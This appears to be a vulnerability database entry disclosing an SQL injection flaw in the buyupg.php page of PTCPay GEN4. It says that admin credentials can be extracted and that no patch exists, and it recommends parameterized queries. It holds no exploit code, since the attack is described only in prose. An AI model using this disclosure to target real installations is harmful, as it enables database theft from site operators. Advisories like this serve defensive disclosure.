Vendor: PTCPay GEN4
By: Dark.Man
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: PTCPay GEN4
Affected Version From: PTCPay GEN4
Affected Version To: PTCPay GEN4
Patch Exists: No
Related CWE: N/A
CPE: a:ptcpay:ptcpay_gen4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability
PTCPay GEN4 is vulnerable to SQL injection in the buyupg.php page. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious SQL query to the buyupg.php page. This will allow the attacker to extract sensitive information from the database, such as the admin username and password.
Mitigation:
To mitigate this vulnerability, the application should use parameterized queries and input validation to prevent malicious SQL queries from being executed.